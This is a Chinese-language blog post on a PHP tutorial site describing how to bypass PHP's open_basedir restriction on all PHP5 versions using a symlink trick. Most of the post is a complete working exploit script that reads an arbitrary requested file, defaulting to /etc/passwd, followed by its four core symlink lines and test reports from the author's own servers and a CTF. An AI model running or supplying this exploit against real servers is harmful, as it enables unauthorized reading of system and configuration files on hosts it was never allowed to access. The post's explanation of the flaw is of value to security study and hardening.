编程 PHP

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

Posted in PHP onJanuary 20, 2015

漏洞很久之前（大概5年前）被提出来了，但并不是php代码上的问题，所以问题一直存在，直到现在。我一直没留意，后来yaseng告诉我的，他测试了好像5.5都可以。

漏洞详情在这里 http://cxsecurity.com/issue/WLB-2009110068。

给出我写的EXP：

<?php

/*

* by phithon

* From https://3water.com

* detail: http://cxsecurity.com/issue/WLB-2009110068

*/

header('content-type: text/plain');

error_reporting(-1);

ini_set('display_errors', TRUE);

printf("open_basedir: %s\nphp_version: %s\n", ini_get('open_basedir'), phpversion());

printf("disable_functions: %s\n", ini_get('disable_functions'));

$file = str_replace('\\', '/', isset($_REQUEST['file']) ? $_REQUEST['file'] : '/etc/passwd');

$relat_file = getRelativePath(__FILE__, $file);

$paths = explode('/', $file);

$name = mt_rand() % 999;

$exp = getRandStr();

mkdir($name);

chdir($name);

for($i = 1 ; $i < count($paths) - 1 ; $i++){

  mkdir($paths[$i]);

  chdir($paths[$i]);

}

mkdir($paths[$i]);

for ($i -= 1; $i > 0; $i--) { 

  chdir('..');

}

$paths = explode('/', $relat_file);

$j = 0;

for ($i = 0; $paths[$i] == '..'; $i++) { 

  mkdir($name);

  chdir($name);

  $j++;

}

for ($i = 0; $i <= $j; $i++) { 

  chdir('..');

}

$tmp = array_fill(0, $j + 1, $name);

symlink(implode('/', $tmp), 'tmplink');

$tmp = array_fill(0, $j, '..');

symlink('tmplink/' . implode('/', $tmp) . $file, $exp);

unlink('tmplink');

mkdir('tmplink');

delfile($name);

$exp = dirname($_SERVER['SCRIPT_NAME']) . "/{$exp}";

$exp = "http://{$_SERVER['SERVER_NAME']}{$exp}";

echo "\n-----------------content---------------\n\n";

echo file_get_contents($exp);

delfile('tmplink');
function getRelativePath($from, $to) {

  // some compatibility fixes for Windows paths

  $from = rtrim($from, '\/') . '/';

  $from = str_replace('\\', '/', $from);

  $to   = str_replace('\\', '/', $to);
  $from   = explode('/', $from);

  $to     = explode('/', $to);

  $relPath  = $to;
  foreach($from as $depth => $dir) {

    // find first non-matching dir

    if($dir === $to[$depth]) {

      // ignore this directory

      array_shift($relPath);

    } else {

      // get number of remaining dirs to $from

      $remaining = count($from) - $depth;

      if($remaining > 1) {

        // add traversals up to first matching dir

        $padLength = (count($relPath) + $remaining - 1) * -1;

        $relPath = array_pad($relPath, $padLength, '..');

        break;

      } else {

        $relPath[0] = './' . $relPath[0];

      }

    }

  }

  return implode('/', $relPath);

}
function delfile($deldir){

  if (@is_file($deldir)) {

    @chmod($deldir,0777);

    return @unlink($deldir);

  }else if(@is_dir($deldir)){

    if(($mydir = @opendir($deldir)) == NULL) return false;

    while(false !== ($file = @readdir($mydir)))

    {

      $name = File_Str($deldir.'/'.$file);

      if(($file!='.') && ($file!='..')){delfile($name);}

    } 

    @closedir($mydir);

    @chmod($deldir,0777);

    return @rmdir($deldir) ? true : false;

  }

}
function File_Str($string)

{

  return str_replace('//','/',str_replace('\\','/',$string));

}
function getRandStr($length = 6) {

  $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';

  $randStr = '';

  for ($i = 0; $i < $length; $i++) {

    $randStr .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);

  }

  return $randStr;

}

如我们欲读取/etc/passwd。其实原理就是创建一个链接文件x，用相对路径指向a/a/a/a，再创建一个链接文件exp指向x/../../../etc/passwd。

其实指向的就是a/a/a/a/../../../etc/passwd，其实就是./etc/passwd。

这时候删除x，再创建一个x目录，但exp还是指向x/../../../etc/passwd，所以就成功跨到/etc/passwd了。

精华就是这四句：

symlink("abc/abc/abc/abc","tmplink"); 

symlink("tmplink/../../../etc/passwd", "exploit"); 

unlink("tmplink"); 

mkdir("tmplink");

我们访问http://xxx/exp，如果服务器支持链接文件的访问，那么就能读到/etc/passwd。

其中并没有任何操作触发open_basedir，但达到的效果就是绕过了open_basedir读取任意文件。

错误不在php，但又不知道把错误归结到谁头上，所以php一直未管这个问题。

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

open_basedir

将 PHP 所能打开的文件限制在指定的目录树，包括文件本身。本指令不受安全模式打开或者关闭的影响。

当一个脚本试图用例如 fopen() 或者 gzopen() 打开一个文件时，该文件的位置将被检查。当文件在指定的目录树之外时 PHP 将拒绝打开它。所有的符号连接都会被解析，所以不可能通过符号连接来避开此限制。

特殊值 . 指明脚本的工作目录将被作为基准目录。但这有些危险，因为脚本的工作目录可以轻易被 chdir() 而改变。

在 httpd.conf 文件中中，open_basedir 可以像其它任何配置选项一样用“php_admin_value open_basedir none”的方法关闭（例如某些虚拟主机中）。

在 Windows 中，用分号分隔目录。在任何其它系统中用冒号分隔目录。作为 Apache 模块时，父目录中的 open_basedir 路径自动被继承。

用 open_basedir 指定的限制实际上是前缀，不是目录名。也就是说“open_basedir = /dir/incl”也会允许访问“/dir/include”和“/dir/incls”，如果它们存在的话。如果要将访问限制在仅为指定的目录，用斜线结束路径名。例如：“open_basedir = /dir/incl/”。

Note:

支持多个目录是 3.0.7 加入的。

默认是允许打开所有文件。

我在我的VPS（php5.3.28 + nginx）和树莓派（php 5.4.4 + nginx）上都测试过，成功读取。

树莓派测试：

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

相比于5.3 XML那个洞（那个很多文件读不了），这个成功率还是比较稳的，很多文件都能读。而且版本没要求，危害比较大。

前几天成信的CTF，试了下这个脚本，apache也可以读取，当时读了读kali机子的/etc/httpd/conf/httpd.conf，没啥收获。

发现没旁站，流量是通过网关转发的。

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

- Author -

junjie

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

php session 错误

May 21 PHP

PHP获取MAC地址的具体实例

Dec 13 PHP

php中实现记住密码下次自动登录的例子

Nov 06 PHP

php格式化金额函数分享

Feb 02 PHP

PHP加密解密类实例分析

Apr 20 PHP

浅析iis7.5安装配置php环境

May 10 PHP

ThinkPHP在Cli模式下使用模板引擎的方法

Sep 25 PHP

学习PHP的数组总结【经验】

May 05 PHP

浅谈PHP检查数组中是否存在某个值 in_array 函数

Jun 13 PHP

基于ThinkPHP5.0实现图片上传插件

Sep 25 PHP

PHP经典设计模式之依赖注入定义与用法详解

May 21 PHP

php-7.3.6 编译安装过程

Feb 11 PHP

php中解析带中文字符的url函数分享

Jan 20 #PHP

PHP中使用正则表达式提取中文实现笔记

Jan 20 #PHP

php中的观察者模式简单实例

Jan 20 #PHP

php 5.6版本中编写一个PHP扩展的简单示例

Jan 20 #PHP

PHP函数extension_loaded()用法实例

Jan 19 #PHP

php使用正则表达式获取图片url的方法

Jan 16 #PHP

php使用CURL伪造IP和来源实例详解

Jan 15 #PHP

You might like

Flash空降上海化身大魔王接受挑战

2020/03/02 星际争霸

PHP安全配置

2006/10/09 PHP

php 文件状态缓存带来的问题

2008/12/14 PHP

使用cookie实现统计访问者登陆次数

2013/06/08 PHP

调整PHP的性能

2013/10/30 PHP

PHP面向对象之旅:深入理解static变量与方法

2014/01/06 PHP

PHP小偷程序的设计与实现方法详解

2016/10/15 PHP

laravel 实现划分admin和home 模块分组

2019/10/15 PHP

新页面打开实际尺寸的图片

2006/08/25 Javascript

用JQUERY增删元素的代码

2012/02/14 Javascript

js控制页面控件隐藏显示的两种方法介绍

2013/10/09 Javascript

js实现简单的计算器功能

2017/01/16 Javascript

Angular.js跨controller实现参数传递的两种方法

2017/02/20 Javascript

详解Vue爬坑之vuex初识

2017/06/14 Javascript

JavaScript基础心法深浅拷贝(浅拷贝和深拷贝)

2018/03/05 Javascript

ES6的异步终极解决方案分享

2019/07/11 Javascript

Layui 数据表格批量删除和多条件搜索的实例

2019/09/04 Javascript

echarts实现获取datazoom的起始值(包括x轴和y轴)

2020/07/20 Javascript

[31:00]2014 DOTA2华西杯精英邀请赛5 24 NewBee VS iG

2014/05/25 DOTA

介绍Python中的__future__模块

2015/04/27 Python

Python序列操作之进阶篇

2016/12/08 Python

python制作爬虫爬取京东商品评论教程

2016/12/16 Python

Python2.7+pytesser实现简单验证码的识别方法

2017/12/29 Python

python编程培训 python培训靠谱吗

2018/01/17 Python

对python中的乘法dot和对应分量相乘multiply详解

2018/11/14 Python

Python3开发实例之非关系型图数据库Neo4j安装方法及Python3连接操作Neo4j方法实例

2020/03/18 Python

HTML5实现获取地理位置信息并定位功能

2015/04/25 HTML / CSS

Canvas引入跨域的图片导致toDataURL()报错的问题的解决

2018/09/19 HTML / CSS

英国高级健康和美容产品零售商：Life and Looks

2019/08/01 全球购物

一套PHP的笔试题

2013/05/31 面试题

国庆宣传标语

2014/06/30 职场文书

国土资源局开展党的群众路线教育实践活动整改措施

2014/09/26 职场文书

列车乘务员工作不细心检讨书

2014/10/07 职场文书

办公室文员岗位职责

2015/02/04 职场文书

2015年度质量工作总结报告

2015/04/27 职场文书

JDBC连接的六步实例代码（与mysql连接）

2021/05/12 MySQL